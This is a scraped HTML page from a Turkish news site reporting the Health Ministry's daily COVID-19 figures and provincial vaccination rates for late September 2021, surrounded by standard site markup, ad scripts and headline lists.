						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/headline_1.jpg" class="img-responsive center-block" alt="yıllık izin">
														<figcaption class="small-caption">
								<div class="title one-line">yıllık izin</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/2021-agustos-ayi-personel-alimi-ve-is-ilanlari-binlerce-kpss-li-kpss-siz-memur-ve-isci-alimi-guncellendi-h47561.html" onclick="window.open('https://www.kamusaati.com/gundem/2021-agustos-ayi-personel-alimi-ve-is-ilanlari-binlerce-kpss-li-kpss-siz-memur-ve-isci-alimi-guncellendi-h47561.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/2021_haziran_ayi_personel_alimi_ve_is_ilanlari_binlerce_kpss_li_kpss_siz_memur_ve_isci_alimi_guncellendi_h46364_13432.png" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/2021-temmuz-enflasyonu-aciklandi-ilk-aydan-memurlarin-maasi-eridi-h47537.html" onclick="window.open('https://www.kamusaati.com/gundem/2021-temmuz-enflasyonu-aciklandi-ilk-aydan-memurlarin-maasi-eridi-h47537.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/headline.jpg" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/kpss-haberleri/2021-kpss-soru-kitapcigi-ve-cevap-anahtari-a-grubu-ve-ogretmenlik-gy-gk-egitim-bilimleri-sorulari-h47509.html" onclick="window.open('https://www.kamusaati.com/kpss-haberleri/2021-kpss-soru-kitapcigi-ve-cevap-anahtari-a-grubu-ve-ogretmenlik-gy-gk-egitim-bilimleri-sorulari-h47509.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/08/4009060.jpg" class="img-responsive center-block" alt="kpss2021">
														<figcaption class="small-caption">
								<div class="title one-line">kpss2021</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/isci-haberleri/iscilerin-calisma-ve-ara-dinlenme-sureleri-ne-kadardir-h47168.html" onclick="window.open('https://www.kamusaati.com/isci-haberleri/iscilerin-calisma-ve-ara-dinlenme-sureleri-ne-kadardir-h47168.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/07/321421.jpg" class="img-responsive center-block" alt="iş kanunu">
														<figcaption class="small-caption">
								<div class="title one-line">iş kanunu</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/her-iscinin-bilmesi-gereken-kritik-bilgiler-is-kanunu-h46609.html" onclick="window.open('https://www.kamusaati.com/gundem/her-iscinin-bilmesi-gereken-kritik-bilgiler-is-kanunu-h46609.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/06/3856942.jpg" class="img-responsive center-block" alt="işçi">
														<figcaption class="small-caption">
								<div class="title one-line">işçi</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/kpss-haberleri/2022-kpss-guncel-bilgiler-cikabilecek-sorular-genel-kultur-2022-kpss-h46575.html" onclick="window.open('https://www.kamusaati.com/kpss-haberleri/2022-kpss-guncel-bilgiler-cikabilecek-sorular-genel-kultur-2022-kpss-h46575.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/05/kpss_2022.png" class="img-responsive center-block" alt="kpss güncel">
														<figcaption class="small-caption">
								<div class="title one-line">kpss güncel</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/e-devlet-esnaf-destek-basvurusu-ekrani-basvuru-nereden-nasil-yapili-e-devlet-esnaf-destek-basvurusu-2021-h46435.html" onclick="window.open('https://www.kamusaati.com/gundem/e-devlet-esnaf-destek-basvurusu-ekrani-basvuru-nereden-nasil-yapili-e-devlet-esnaf-destek-basvurusu-2021-h46435.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/05/hibe-destegi_2932.jpg" class="img-responsive center-block" alt="esnaf destek">
														<figcaption class="small-caption">
								<div class="title one-line">esnaf destek</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
							</div>
		</div>
	</div>
	<div class="clearfix"></div>
<!--Üst Manşet-->
                  <div class="row">
          	<div class="col-md-8 col-xs-12">                            <div id="haberler">
  <div class="haber-kapsa haber-48574">
    <section class="panel panel-default panel-bittersweet">
      <article id="haber">
      <div class="panel-heading">
        <div class="caption">
          <h1 id="haber_baslik">29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?</h1>
        </div>
      </div>
              <div class="panel-body">
        <div class="summary">
          <h2>
          <q>29 Eylül Çarşamba virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son durum ne Sağlık Bakanı Fahrettin Koca son 24 saatte koronavirüsten kaç kişinin hayatını kaybetti?, kaç yeni vakanın tespit edildi? Türkiye&#039;de son 24 saatte koronavirüs Kovid-19 Bilançosu İşte Detaylar</q>
        </h2>
        </div>
          <div class="col-sm-12 reklam reklam130 no-pd"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- yenireklams 336*280 -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="8060082953"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div><div class="clearfix"></div>                  <figure class="row">
            <div class="news-overlay"></div>
            <img src="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg" class="img-responsive center-block" alt="29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?">
            <figcaption class="tools">
              <span class="tarih-degistir" data-date="2021-09-28 18:30:27" content="2021-09-28T18:30:27+02:00"><i class="fa fa-clock-o"></i> 28 Eylül 2021 Salı 18:30</span>
                            <span class="hidden-xs"><i class="fa fa-comment"></i> 0</span>
              <span class="pull-right hidden-xs">
                <span class="pull-left">
                  <a href="javascript:font_up(48574)" class="text_bigger">A <sup>+</sup></a>
                  <a href="javascript:font_down(48574)" class="text_smaller">A <sup>-</sup></a>
                </span>
                <span class="pull-left"><a href="javascript:window.print()"><i class="fa fa-print"></i> Yazdır</a></span>
              </span>
            </figcaption>
          </figure>
                <div class="share share-haber-48574"></div>
        <hr>
                          <div class="pull-left reklam reklam131 reklam-m-r no-pd_left m-b-xs"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- YENİ MASAÜSTÜ -->
<ins class="adsbygoogle"
 style="display:inline-block;width:336px;height:280px"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="3193934937"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>          <div id="newstext_48574" class="text">
            <div class="col-sm-9 speccol780" style="transform:none">
<div class="body" style="transform:none">
<h3>Sağlık Bakanlığı, son 24 saatte 239 kişinin korona virüsten hayatını kaybettiğini, 28 bin 892 yeni vakanın olduğunu açıkladı.</h3>

<div class="content">
<p>Sağlık Bakanlığı tarafından Türkiye'nin yeni korona virüs tablosu açıklandı 28 Eylül'de açıklanan 24 saatlik verilere göre 28 bin 892 vaka tespit edildi. Virüs nedeniyle hayatını kaybedenlerin sayısı 239 oldu. Bir günde toplam 356 bin 661 test yapılırken, iyileşen hasta sayısı 30 bin 336 olarak kaydedildi. Sağlık Bakanlığı tarafından açıklanan tabloda,2 doz aşılama verilerine de yer verildi. En az 2 doz aşı olmuş 18 yaş üzeri nüfusu kapsayan verilere göre Türkiye'de 2. doz aşılama ortalama yüzde 70,98 oldu. 1. doz ortalaması yüzde 86,45 olurken, 1., 2. ve 3. doz aşısını olan vatandaş sayısı toplamda 108 milyon 734 bin 111'e yükseldi.</p>

<p><strong>2 doz aşılamada ilk sırada Kırklareli var</strong></p>

<p>Verilerde, aşılamada önde giden illere de yer verildi. Bakanlığın tablosuna göre yüzde 78,1 ile Türkiye'de en çok aşılamanın gerçekleştirildiği Kırklareli'yi Muğla, Amasya, Eskişehir Çanakkale, Ordu, Edirne, Balıkesir, Burdur ve Osmaniye takip etti.</p>

<p><strong>En düşük aşılama Şanlıurfa'da</strong></p>

<p>Bakanlığın tablosuna göre yüzde 45,0 ile Türkiye'de en az aşılamanın gerçekleştirildiği Şanlıurfa'yı sırasıyla Mardin, Batman, Bitlis, Muş, Diyarbakır, Siirt, Bingöl, Ağrı ve Şırnak takip etti.</p>

<p>Sağlık Bakanı Fahrettin Koca, sosyal paylaşım sitesi Twitter hesabından yaptığı paylaşımda, "‘Bu kadar insanın içinde gelip beni mi bulacak?' Covid-19 toplam vaka sayısı, bugün 28 bin 892 yeni vakayla, 7 Milyon 95.580'e yükseldi. Testleri pozitif çıkana kadar çoğu insan kendini riskten uzak görüyordu. Maske ve mesafe konusunda dikkatli olup, aşılarımızı mutlaka yaptıralım!” dedi.</p>
&nbsp;

<p><img class="detayFoto" src="https://www.kamusaati.com/images/upload/resim_2348.png" /></p>
</div>
</div>
</div>
                      </div>
          </br>Kaynak: <strong>Kamu Saati Özel</strong>            <div class="col-sm-12 reklam reklam136 no-pd"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- ESNEK HEM GÖRÜNTÜLÜ -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="3647831709"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div><div class="clearfix"></div>                                                               <div id="yorumyaz48574"></div>
                    </div>
                     </article>
                  </section>

                                                                    <div class="comment">
      <div class="panel panel-default panel-aqua comment-new no-mg" id="p_id48574">
  <div class="panel-heading">
    <div class="caption">
      <i class="fa fa-commenting-o fa-fw"></i>
      <b>Yorum Ekle</b>
    </div>
  </div>
  <div id="yorumpaneli" class="panel-body">
    <div class="media">
      <form  name="comment" class="comment_form comment_id48574" id="addcomment">
        <div class="media-left hidden-xs">
          <div class="media-object">
                          <img src="https://www.kamusaati.com/_themes/hs-royal/images/no_author.jpg" alt="Avatar" class="img-rounded"/>            </div>
          </div>
          <div class="media-body">
            <div class="form-group row">
              <div class="col-sm-5 col-xs-12">
                <div class="input-group">
                  <span class="input-group-addon">İsim</span>
                  <input name="isim"  class="form-control isim" type="text"  id="isim"  title="İsim" />
                  </div>
                </div>
              </div>
              <div class="form-group">
                <textarea name="yorum" maxlength="1000" class="form-control" rows="3" id="comment_field" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea>
              </div>
              <input type="hidden" name="hid" value="48574" />
              <input type="hidden" name="uid" value="0" />
              <input type="hidden" name="tip" value="haber" />
              <input type="hidden" name="cevap" value="" class="answer" />
              <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
              <input type="hidden" name="token" value="e3f653795ddcff14634a7f204c074bd0ad8c2447" />
      <div class="alert alert-info answer" style="display:none;"><b>@name</b> kişiye yanıt olarak<a class="close kaldir" href="javascript:ckaldir(48574)">&times;</a></div>
              <div class="form-group text-right">
                <button id="input-submit" onclick="javascript:comment_send(48574);return false;" class="btn btn-success btn-sm btn-icon-left"><i class="fa fa-send"></i> GÖNDER</button>
              </div>
            </div>
          </form>
        </div>
      </div>
      <div class="alert alert-success">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
      <div class="alert alert-block alert-danger fade in">
        <button type="button" class="close" data-dismiss="alert">×</button>
          <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, müstehcen, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir.        </div>
    </div>
    <div class="panel panel-default panel-aqua comment-list">
    <div class="panel-body">
      <div class="panel-body">

        <!-- Nav tabs -->
        <ul class="nav nav-tabs" role="tablist">
                                    <li role="presentation" class="active">
                <a href="#facebook_comments48574" aria-controls="facebook_comments48574" class="background-fb" role="tab" data-toggle="tab" aria-expanded="false">
                  <i class="fa fa-facebook-square fa-fw"></i> <strong class="hidden-xs hidden-sm">Facebook Yorumları</strong>
                  <span class="badge color-fb"><fb:comments-count href="https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html">0</fb:comments-count></span>
                </a>
              </li>
                          </ul>
            <!-- [Panel Tabs:Finish] -->

            <!-- Tab panes -->
            <div class="tab-content">
                                                <div role="tabpanel" class="tab-pane fade in active" id="facebook_comments48574">
                    <div class="row-fluid">
                      <div id="fb-root"></div>
                      <script>(function(d, s, id) {
                        var js, fjs = d.getElementsByTagName(s)[0];
                        if (d.getElementById(id)) return;
                        js = d.createElement(s); js.id = id;
                        js.src = "//connect.facebook.net/tr-TR/all.js#xfbml=1";
                        fjs.parentNode.insertBefore(js, fjs);
                      }(document, 'script', 'facebook-jssdk'));</script>
                      <div class="fb-comments" data-href="https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                    </div> <!-- #facebookpanel -->
                  </div>
                                  </div>
                <!-- Tab panes -->
              </div>
            </div>
          </div>
        </div>
                    
<span class="hidden-modul" style="display:none">haber</span>
<span class="hidden-id" style="display:none">48574</span>
<span class="hidden-sayfa" style="display:none">false</span>
</div>
<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-gunluk-burc-yorumlari-ask-is-para-durumlari-gunluk-burc-yorumlari-bugun-neler-soyluyor-gunluk-burc-yorumlari-2021-h48575.html" id="sonrakiHaber"></a>
</div>
              </div>

          	<aside class="col-md-4 col-xs-12">
        <!--Çok Yorumlanan Haberler-->
	<div class="panel panel-default panel-bittersweet panel-cokyorumlanan">
		<div class="panel-heading">
			<div class="caption">
				<i class="fa fa-file-text fa-fw"></i>
				<b>Çok</b> Yorumlananlar			</div>
		</div>
		<div class="panel-body">
			<div class="news-list">
				<ul class="list-group">
										</ul>
				</div>
			</div>
		</div>
		<!--Çok Yorumlanan Haberler-->
<!--Çok Okunan Haberler-->
					<div class="panel panel-default panel-aqua panel-cokokunan">
				<div class="panel-heading">
					<div class="caption">
						<i class="fa fa-file-text fa-fw"></i>
						<b>Çok</b> Okunanlar					</div>
				</div>
				<div class="panel-body">
					<div class="news-list">
						<ul class="list-group">
															<li class="list-group-item">
									<span class="badge">1</span>
									<a href="https://www.kamusaati.com/gundem/motorine-benzine-lpg-ye-bir-dudak-ucuklatan-zam-daha-sozun-tukendigi-yerdeyiz-h48572.html" target="_blank" class="strong one-line">MOTORİNE BENZİNE LPG&#039;ye bir...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">2</span>
									<a href="https://www.kamusaati.com/gundem/velilerin-kaynak-kitap-sorunu-suruyor-ogretmenler-devletin-verdigi-kitaplari-kabul-etmiyor-h48564.html" target="_blank" class="strong one-line">Velilerin kaynak kitap sorunu sürüyor...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">3</span>
									<a href="https://www.kamusaati.com/gundem/dogalgaza-akil-almaz-zam-geliyor-h48573.html" target="_blank" class="strong one-line">Doğalgaza akıl almaz zam geliyor</a>

								</li>
																<li class="list-group-item">
									<span class="badge">4</span>
									<a href="https://www.kamusaati.com/gundem/kucukcekmece-cennet-mahallesi-duraginda-metrobus-arizalandi-h48568.html" target="_blank" class="strong one-line">Küçükçekmece Cennet Mahallesi durağında...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">5</span>
									<a href="https://www.kamusaati.com/gundem/abd-istanbul-baskonsoloslugu-11-bin-dolar-maasla-otomobil-tamircisi-ariyor-h48569.html" target="_blank" class="strong one-line">ABD İstanbul Başkonsolosluğu, 11...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">6</span>
									<a href="https://www.kamusaati.com/gundem/28-eylul-sali-gunluk-burc-yorumlari-ask-is-para-durumlari-gunluk-burc-yorumlari-bugun-neler-soyluyor-gunluk-burc-yorumlari-2021-h48560.html" target="_blank" class="strong one-line">28 Eylül Salı Günlük Burç Yorumları...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">7</span>
									<a href="https://www.kamusaati.com/gundem/konya-da-ogrencisine-kotu-davranan-ogretmen-hakkinda-sorusturma-baslatildi-h48571.html" target="_blank" class="strong one-line">Konya&#039;da öğrencisine kötü...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">8</span>
									<a href="https://www.kamusaati.com/gundem/28-eylul-sali-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48559.html" target="_blank" class="strong one-line">28 Eylül Salı Koronavirüs Tablosu,...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">9</span>
									<a href="https://www.kamusaati.com/gundem/bugun-ceyrek-altin-kac-lira-oldu-dolar-euro-altin-yukselecek-mi-dusecek-mi-28-eylul-sali-h48562.html" target="_blank" class="strong one-line">Bugün çeyrek altın kaç lira oldu?...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">10</span>
									<a href="https://www.kamusaati.com/resmi-gazete/28-eylul-sali-2021-resmi-gazete-kararlari-h48561.html" target="_blank" class="strong one-line">28 Eylül Salı 2021 Resmi Gazete Kararları</a>

								</li>
															</ul>
						</div>
					</div>
				</div>
				<!--Çok Okunan Haberler-->
<!--Biyografi-->
<!--Biyografi-->
<!--Özel Haber-->
<div class="panel panel-default panel-bittersweet panel-ozelhaber">
	<div class="panel-heading">
		<div class="caption">
			<i class="fa fa-file-text fa-fw"></i>
			<b>Özel</b> Haber		</div>
	</div>
	<div class="panel-body">
		<div class="news-list">
			<ul class="list-group">
									<li class="list-group-item">
						<span class="badge">1</span>
						<a href="https://www.kamusaati.com/gundem/hem-oz-babadan-hem-de-kendisini-evlat-edinen-babadan-maas-alinabilir-mi-h48442.html" target="_blank" class="strong one-line">Hem öz babadan hem de kendisini evlat edinen babadan maaş alınabilir mi?</a>
					</li>
										<li class="list-group-item">
						<span class="badge">2</span>
						<a href="https://www.kamusaati.com/gundem/sonmez-okullarimizda-yuz-yuze-egitim-uc-devre-olsun-h47730.html" target="_blank" class="strong one-line">Sönmez: &#039;Okullarımızda yüz yüze eğitim üç devre olsun&#039;</a>
					</li>
										<li class="list-group-item">
						<span class="badge">3</span>
						<a href="https://www.kamusaati.com/gundem/bugun-ceyrek-altin-kac-lira-oldu-dolar-euro-altin-yukselecek-mi-dusecek-mi-5-agustos-persembe-2021-h47565.html" target="_blank" class="strong one-line">Bugün çeyrek altın kaç lira oldu? Dolar Euro Altın Yükselecek mi? Düşecek mi? 5 Ağustos Perşembe 2021</a>
					</li>
										<li class="list-group-item">
						<span class="badge">4</span>
						<a href="https://www.kamusaati.com/kpss-haberleri/2021-kpss-soru-kitapcigi-ve-cevap-anahtari-a-grubu-ve-ogretmenlik-gy-gk-egitim-bilimleri-sorulari-h47509.html" target="_blank" class="strong one-line">2021 KPSS soru kitapçığı ve cevap anahtarı | A Grubu ve Öğretmenlik (GY-GK- Eğitim Bilimleri) soruları</a>
					</li>
										<li class="list-group-item">
						<span class="badge">5</span>
						<a href="https://www.kamusaati.com/gundem/kurban-bayrami-mesajlari-en-guzel-anlamli-ve-resimli-kurban-bayrami-mesajlari-2021-h44068.html" target="_blank" class="strong one-line">Kurban bayramı mesajları En güzel Anlamlı ve Resimli Kurban Bayramı mesajları 2021</a>
					</li>
									</ul>
			</div>
		</div>
	</div>
<!--Özel Haber-->
<!--Günün Manşetleri-->
	<div class="panel panel-default panel-bittersweet panel-gununmansetleri">
		<div class="panel-heading">
			<div class="caption">
				<i class="fa fa-quote-left fa-fw"></i>
				<b>Günün</b> Manşetleri			</div>
		</div>
		<div class="panel-body">
			<div class="today-headlines-slider">
				<div class="swiper-wrapper">
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/bugun-ceyrek-altin-kac-lira-oldu-dolar-euro-altin-yukselecek-mi-dusecek-mi-29-eylul-carsamba-h48577.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2021/09/bugun-ceyrek-altin-kac-lira-oldu-dolar-euro-altin-yukselecek-mi-dusecek-mi-29-eylul-carsamba_2b430.png" class="img-responsive center-block" alt="Bugün çeyrek altın kaç lira oldu? Dolar Euro Altın Yükselecek mi? Düşecek mi ? 29 Eylül Çarşamba">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/bugun-ceyrek-altin-kac-lira-oldu-dolar-euro-altin-yukselecek-mi-dusecek-mi-29-eylul-carsamba-h48577.html" class="title one-line">Bugün çeyrek altın kaç lira oldu? Dolar Euro Altın Yükselecek mi? Düşecek mi ? 29 Eylül Çarşamba</a>
								<div class="summary faint-text line-2">
									Çeyrek altın kaç lira oldu? çeyrek altın düşecek mi?  Küçük altın kaç lira? küçük altın düşecek mi? Peki dolar kaç lira oldu? Euro kaç lira oldu? Borsa Son Dakika 29 Eylül Çarşamba								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-2021-resmi-gazete-kararlari-h48576.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_2021_resmi_gazete_kararlari_h48576_1436c.png" class="img-responsive center-block" alt="29 Eylül Çarşamba 2021 Resmi Gazete Kararları">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-2021-resmi-gazete-kararlari-h48576.html" class="title one-line">29 Eylül Çarşamba 2021 Resmi Gazete Kararları</a>
								<div class="summary faint-text line-2">
									29 Eylül Çarşamba işten çıkarma yasağı, atanmalar görevden almalar işte bugünkü Resmi Gazete Kararları&#039;nda yer aldı. TC Resmi Gazete&#039;de hangi karar ve yönetmelikler yayımlandı? Resmi Gazete bugün...								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-gunluk-burc-yorumlari-ask-is-para-durumlari-gunluk-burc-yorumlari-bugun-neler-soyluyor-gunluk-burc-yorumlari-2021-h48575.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2021/09/29-eylul-carsamba-gunluk-burc-yorumlari-ask-is-para-durumlari-gunluk-burc-yorumlari-bugun-neler-soyluyor-gunluk-burc-yorumlari-2021_d9d2c.jpg" class="img-responsive center-block" alt="29 Eylül Çarşamba Günlük Burç Yorumları Aşk, İş, Para Durumları | Günlük Burç Yorumları Bugün Neler Söylüyor? Günlük Burç Yorumları 2021!">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-gunluk-burc-yorumlari-ask-is-para-durumlari-gunluk-burc-yorumlari-bugun-neler-soyluyor-gunluk-burc-yorumlari-2021-h48575.html" class="title one-line">29 Eylül Çarşamba Günlük Burç Yorumları Aşk, İş, Para Durumları | Günlük Burç Yorumları Bugün Neler Söylüyor? Günlük Burç Yorumları 2021!</a>
								<div class="summary faint-text line-2">
									29 Eylül Çarşamba burç yorumları astrolojiye ilgi duyanlar tarafından araştırılıyor. Peki, kimler haftaya güzel başlayacak? Akşam saatlerinde iletişim konusunda zorluklar olabilir. Boğalar kıskançlıklara maruz kalabilir, Aslanlar ailesiyle ilgilenebilir. İşte 29 Eylül günlük burç yorumları…								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2021/09/29_eylul_carsamba_koronavirus_tablosu_virus_vaka_sayisi_kac_vaka_sayisi_artti_mi_olum_sayisi_kac_oldu_h48574_26db4.jpg" class="img-responsive center-block" alt="29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/29-eylul-carsamba-koronavirus-tablosu-virus-vaka-sayisi-kac-vaka-sayisi-artti-mi-olum-sayisi-kac-oldu-h48574.html" class="title one-line">29 Eylül Çarşamba Koronavirüs Tablosu, virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu?</a>
								<div class="summary faint-text line-2">
									29 Eylül Çarşamba virüs vaka sayısı kaç?  vaka sayısı arttı mı ? ölüm sayısı kaç oldu? pandemi covid-19 Korona virüs tablosu Türkiye Geneli son durum ne Sağlık Bakanı Fahrettin Koca son 24 saatte koronavirüsten kaç kişinin hayatını kaybetti?, kaç yeni vakanın tespit edildi? Türkiye&#039;de son 24 saatte koronavirüs Kovid-19 Bilançosu İşte Detaylar								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/dogalgaza-akil-almaz-zam-geliyor-h48573.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2021/09/dogalgaza_akil_almaz_zam_geliyor_h48573_42ea7.png" class="img-responsive center-block" alt="Doğalgaza akıl almaz zam geliyor">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/dogalgaza-akil-almaz-zam-geliyor-h48573.html" class="title one-line">Doğalgaza akıl almaz zam geliyor</a>
								<div class="summary faint-text line-2">
									Avrupa’da doğalgaz fiyatları bugün yeni rekorlar kırarak bin metreküp için 1000 dolar eşiğini aştı. Dolaylı olarak da Türkiye’yi de zor günler bekliyor.								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/motorine-benzine-lpg-ye-bir-dudak-ucuklatan-zam-daha-sozun-tukendigi-yerdeyiz-h48572.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2021/09/motorine-benzine-lpg-ye-bir-dudak-ucuklatan-zam-daha-sozun-tukendigi-yerdeyiz_340e7.jpg" class="img-responsive center-block" alt="MOTORİNE BENZİNE LPG&#039;ye bir dudak uçuklatan zam daha! Sözün Tükendiği Yerdeyiz">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/motorine-benzine-lpg-ye-bir-dudak-ucuklatan-zam-daha-sozun-tukendigi-yerdeyiz-h48572.html" class="title one-line">MOTORİNE BENZİNE LPG&#039;ye bir dudak uçuklatan zam daha! Sözün Tükendiği Yerdeyiz</a>
								<div class="summary faint-text line-2">
									EPGİS&#039;den yapılan açıklamada, Motorin&#039;e bu gece yarısından itibaren 45 kuruş zam geldiği belirtildi.								</div>
							</div>
						</div>
									</div>
				<div class="panel-pagination swiper-pagination"></div>
			</div>
		</div>
	</div>
		<!--Günün Manşetleri-->
<!--Sosyal Ağlar-->
	<div class="panel panel-default panel-aqua panel-sosyal">
		<div class="panel-heading">
			<div class="caption">
				<i class="fa fa-thumbs-up fa-fw"></i>
				<b>Sosyal</b> Ağlar			</div>
		</div>
		<div class="panel-body text-center social-box">
			      <div class="hs-social-block hs-facebook">
        <i class="fa fa-facebook"></i><a href="https://facebook.com/Habersondakikaa/" class="hs-sdch" target="_blank" rel="nofollow"> <strong class="hs-facebook-count"></strong> BEĞENİ</a>
